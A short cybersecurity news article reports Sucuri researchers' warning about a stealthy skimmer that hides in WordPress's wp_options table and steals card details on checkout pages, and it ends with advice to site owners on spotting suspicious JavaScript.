Image by Luca Bravo, from Unsplash
Researchers Warn Of Stealthy Malware Stealing Payment Information From WordPress Sites
Reading time: 3 min
Posted on Jan 14, 2025
-
![Kiara Fabbri]()
-
![Justyn Newman]()
Fact-Checked by Justyn Newman Lead Cybersecurity Editor
Cybersecurity researchers at Sucuri are alerting website owners about a new type of cyberattack targeting WordPress e-commerce sites.
In a Rush? Here are the Quick Facts!
- Malware injects malicious JavaScript into WordPress database to steal payment details during checkout.
- It activates on checkout pages and captures data like credit card numbers and CVV codes.
- Stolen data is encrypted and sent to remote servers controlled by attackers.
This attack, known as a credit card skimmer campaign, is designed to secretly steal payment information from customers. The malware operates in the background, injecting malicious code into a WordPress website’s database and compromising checkout pages where customers enter their payment details.
The malware is particularly sneaky because it doesn’t rely on infecting theme files or plugins, which are typically scanned for malicious code. Instead, it hides inside the database, making it harder to detect.
Specifically, the malicious code is embedded in the “wp_options” table, a critical part of the WordPress setup, as noted by Sucuri. This allows it to avoid detection by common security tools and remain on infected sites undisturbed.
Once the malware is activated, it targets the checkout page, where users enter their credit card numbers, expiration dates, and CVV codes. The malicious code looks for the word “checkout” in the web address to ensure it only runs on the payment page, preventing it from being triggered on other parts of the site.
It either adds a fake payment form or hijacks the existing one, making it appear as if users are entering their details on a legitimate payment processor’s form, such as Stripe.
As customers input their credit card information, the malware captures it in real time. To make the stolen data harder to detect, the malware scrambles the information using encoding and encryption techniques, then sends it to remote servers controlled by the attacker.
This process is done quietly, so customers won’t notice anything unusual while completing their purchases.The stolen data is then sold on underground markets or used for fraudulent transactions, putting both customers and businesses at risk.
What makes this attack particularly dangerous is that it operates without disrupting the checkout process, so users are unaware their data is being stolen.
The researchers say that website owners can protect themselves by regularly checking for suspicious code in the WordPress admin panel, specifically under the “Widgets” section. They should look for unfamiliar JavaScript code that could indicate the presence of malware.
Latest articles 
Leave a Comment
Cancel